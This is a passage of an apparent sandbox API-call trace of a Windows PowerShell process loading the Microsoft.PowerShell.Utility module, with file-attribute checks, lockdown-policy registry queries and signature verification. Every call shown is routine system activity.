lpFileInformation=0x653ef8d160 | out: lpFileInformation=0x653ef8d160*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13812212, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x13812212, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x13812212, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x9370)) returned 1 [0230.855] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d040) returned 1 [0230.855] WldpGetLockdownPolicy () returned 0x0 [0230.855] GetSystemInfo (in: lpSystemInfo=0x653ef8d1c0 | out: lpSystemInfo=0x653ef8d1c0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0230.855] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x653ef8d0c8 | out: phkResult=0x653ef8d0c8*=0x844) returned 0x0 [0230.855] RegQueryValueExW (in: hKey=0x844, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x653ef8d118, lpData=0x0, lpcbData=0x653ef8d110*=0x0 | out: lpType=0x653ef8d118*=0x0, lpData=0x0, lpcbData=0x653ef8d110*=0x0) returned 0x2 [0230.855] RegCloseKey (hKey=0x844) returned 0x0 [0230.855] CloseHandle (hObject=0x840) returned 1 [0230.856] CoCreateGuid (in: pguid=0x653ef8d278 | out: pguid=0x653ef8d278*(Data1=0xf58c0738, Data2=0x62eb, Data3=0x4b47, Data4=([0]=0x88, [1]=0xad, [2]=0x28, [3]=0x2c, [4]=0x61, [5]=0xd7, [6]=0x4b, [7]=0x64))) returned 0x0 [0230.868] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0x653ef8c7f0, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0230.868] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8cc40) returned 1 [0230.868] GetFileAttributesExW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1"), fInfoLevelId=0x0, lpFileInformation=0x653ef8cd20 | out: lpFileInformation=0x653ef8cd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x950)) returned 1 [0230.868] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8cc00) returned 1 [0230.869] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0x653ef8c7a0, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0230.869] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0x653ef8c6d0, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0230.869] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8cb20) returned 1 [0230.869] GetFileAttributesExW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1"), fInfoLevelId=0x0, lpFileInformation=0x653ef8cc00 | out: lpFileInformation=0x653ef8cc00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x950)) returned 1 [0230.869] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8cae0) returned 1 [0230.869] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0x653ef8c5d0, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0230.869] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8cab0) returned 1 [0230.869] CreateFileW (lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x840 [0230.869] GetFileType (hFile=0x840) returned 0x1 [0230.869] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ca20) returned 1 [0230.869] GetFileType (hFile=0x840) returned 0x1 [0230.870] WTGetSignatureInfo () returned 0x0 [0230.897] CertDuplicateCertificateContext (pCertContext=0x25b73bb9910) returned 0x25b73bb9910 [0230.897] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x653ef8cb48 | out: phkResult=0x653ef8cb48*=0x85c) returned 0x0 [0230.897] RegQueryValueExW (in: hKey=0x85c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x653ef8cb98, lpData=0x0, lpcbData=0x653ef8cb90*=0x0 | out: lpType=0x653ef8cb98*=0x1, lpData=0x0, lpcbData=0x653ef8cb90*=0x56) returned 0x0 [0230.897] RegQueryValueExW (in: hKey=0x85c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x653ef8cb98, lpData=0x25b5c265a90, lpcbData=0x653ef8cb90*=0x56 | out: lpType=0x653ef8cb98*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x653ef8cb90*=0x56) returned 0x0 [0230.897] RegCloseKey (hKey=0x85c) returned 0x0 [0230.897] CoTaskMemAlloc (cb=0x10) returned 0x25b73b93980 [0230.897] CoTaskMemAlloc (cb=0x50) returned 0x25b73cd0f90 [0230.898] WinVerifyTrust () returned 0x0 [0230.898] CoTaskMemFree (pv=0x25b73cd0f90) [0230.898] CoTaskMemFree (pv=0x25b73b93980) [0230.898] CertFreeCertificateContext (pCertContext=0x25b73bb9910) returned 1 [0230.898] CloseHandle (hObject=0x840) returned 1 [0230.911] GetFileAttributesW (lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\en-US\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\en-us\\microsoft.powershell.utility.psd1")) returned 0xffffffff [0230.912] GetFileAttributesW (lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\en\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\en\\microsoft.powershell.utility.psd1")) returned 0xffffffff [0230.912] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0x653ef8be40, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0230.913] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility", nBufferLength=0x105, lpBuffer=0x653ef8be00, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility", lpFilePart=0x0) returned 0x4f [0230.917] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\PSGetModuleInfo.xml", nBufferLength=0x105, lpBuffer=0x653ef8be40, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\PSGetModuleInfo.xml", lpFilePart=0x0) returned 0x63 [0230.917] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8c290) returned 1 [0230.917] GetFileAttributesExW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\PSGetModuleInfo.xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\psgetmoduleinfo.xml"), fInfoLevelId=0x0, lpFileInformation=0x653ef8c370 | out: lpFileInformation=0x653ef8c370*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0230.917] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c250) returned 1 [0230.917] GetFileAttributesW (lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Commands.Utility.dll" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.commands.utility.dll")) returned 0xffffffff [0230.918] GetFileAttributesW (lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Commands.Utility.dll\\Microsoft.PowerShell.Commands.Utility.dll" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.commands.utility.dll\\microsoft.powershell.commands.utility.dll")) returned 0xffffffff [0230.918] CoTaskMemAlloc (cb=0x20e) returned 0x25b73cfee20 [0230.918] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x25b73cfee20, nSize=0x105 | out: lpBuffer="") returned 0x97 [0230.918] CoTaskMemFree (pv=0x25b73cfee20) [0230.918] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0x653ef8bc00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x39 [0230.918] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8c050) returned 1 [0230.918] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\windowspowershell\\modules"), fInfoLevelId=0x0, lpFileInformation=0x653ef8c130 | out: lpFileInformation=0x653ef8c130*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0230.918] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c010) returned 1 [0230.920] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\windowspowershell\\modules")) returned 0xffffffff [0230.933] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0x653ef8bc00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x2a [0230.933] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8c050) returned 1 [0230.933] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules" (normalized: "c:\\program files\\windowspowershell\\modules"), fInfoLevelId=0x0, lpFileInformation=0x653ef8c130 | out: lpFileInformation=0x653ef8c130*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0230.933] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c010) returned 1 [0230.934] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", nBufferLength=0x105, lpBuffer=0x653ef8bc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", lpFilePart=0x0) returned 0x32 [0230.934] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8c050) returned 1 [0230.934] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules"), fInfoLevelId=0x0, lpFileInformation=0x653ef8c130 | out: lpFileInformation=0x653ef8c130*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x5000)) returned 1 [0230.934] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c010) returned 1 [0230.934] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Commands.Utility", nBufferLength=0x105, lpBuffer=0x653ef8ba60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Commands.Utility", lpFilePart=0x0) returned 0x50 [0230.934] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8beb0) returned 1 [0230.934] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Commands.Utility" (normalized: "c:\\program files\\windowspowershell\\modules\\microsoft.powershell.commands.utility"), fInfoLevelId=0x0, lpFileInformation=0x653ef8bf90 | out: lpFileInformation=0x653ef8bf90*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0230.934] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8be70) returned 1 [0230.938] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8beb0) returned 1 [0230.938] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Commands.Utility" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.commands.utility"), fInfoLevelId=0x0, lpFileInformation=0x653ef8bf90 | out: lpFileInformation=0x653ef8bf90*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0230.938] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8be70) returned 1 [0231.635] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\v4.0_3.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x653ef8b9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\v4.0_3.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x99 [0231.636] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\v4.0_3.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x653ef8b8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\v4.0_3.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x99 [0231.636] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\v4.0_3.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x653ef8b640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\v4.0_3.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x99 [0231.849] GetFileAttributesW (lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1")) returned 0x20 [0231.850] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x105, lpBuffer=0x653ef8b800, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0231.850] CoTaskMemAlloc (cb=0x20c) returned 0x25b73d018a0 [0231.850] GetSystemDirectoryW (in: lpBuffer=0x25b73d018a0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0231.850] CoTaskMemFree (pv=0x25b73d018a0) [0231.850] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x105, lpBuffer=0x653ef8b6d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c [0231.850] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8bb20) returned 1 [0231.850] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll"), fInfoLevelId=0x0, lpFileInformation=0x653ef8bc00 | out: lpFileInformation=0x653ef8bc00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13812212, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x13812212, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x13812212, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x9370)) returned 1 [0231.851] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8bae0) returned 1 [0231.851] WldpGetLockdownPolicy () returned 0x0 [0231.851] GetSystemInfo (in: lpSystemInfo=0x653ef8bc60 | out: lpSystemInfo=0x653ef8bc60*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0231.851] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x653ef8bb68 | out: phkResult=0x653ef8bb68*=0x6f4) returned 0x0 [0231.852] RegQueryValueExW (in: hKey=0x6f4, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x653ef8bbb8, lpData=0x0, lpcbData=0x653ef8bbb0*=0x0 | out: lpType=0x653ef8bbb8*=0x0, lpData=0x0, lpcbData=0x653ef8bbb0*=0x0) returned 0x2 [0231.852] RegCloseKey (hKey=0x6f4) returned 0x0 [0231.852] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x105, lpBuffer=0x653ef8b6a0, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0231.852] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8bb40) returned 1 [0231.852] GetFileAttributesExW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1"), fInfoLevelId=0x0, lpFileInformation=0x25b5bdd8de0 | out: lpFileInformation=0x25b5bdd8de0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5298)) returned 1 [0231.853] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8bb00) returned 1 [0231.853] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x105, lpBuffer=0x653ef8b660, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0231.853] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8bab0) returned 1 [0231.853] GetFileAttributesExW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1"), fInfoLevelId=0x0, lpFileInformation=0x653ef8bb90 | out: lpFileInformation=0x653ef8bb90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5298)) returned 1 [0231.853] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ba70) returned 1 [0231.853] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x105, lpBuffer=0x653ef8b610, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0231.853] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x105, lpBuffer=0x653ef8b540, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0231.853] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8b990) returned 1 [0231.853] GetFileAttributesExW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1"), fInfoLevelId=0x0, lpFileInformation=0x653ef8ba70 | out: lpFileInformation=0x653ef8ba70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5298)) returned 1 [0231.853] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8b950) returned 1 [0231.854] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x105, lpBuffer=0x653ef8b440, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0231.854] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8b920) returned 1 [0231.854] CreateFileW (lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x6f4 [0231.854] GetFileType (hFile=0x6f4) returned 0x1 [0231.854] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8b890) returned 1 [0231.854] GetFileType (hFile=0x6f4) returned 0x1 [0231.854] WTGetSignatureInfo () returned 0x0 [0231.892] CertDuplicateCertificateContext (pCertContext=0x25b73bb9910) returned 0x25b73bb9910 [0231.893] RegOpenKeyExW (in: hKey=0xffffffff80000002, 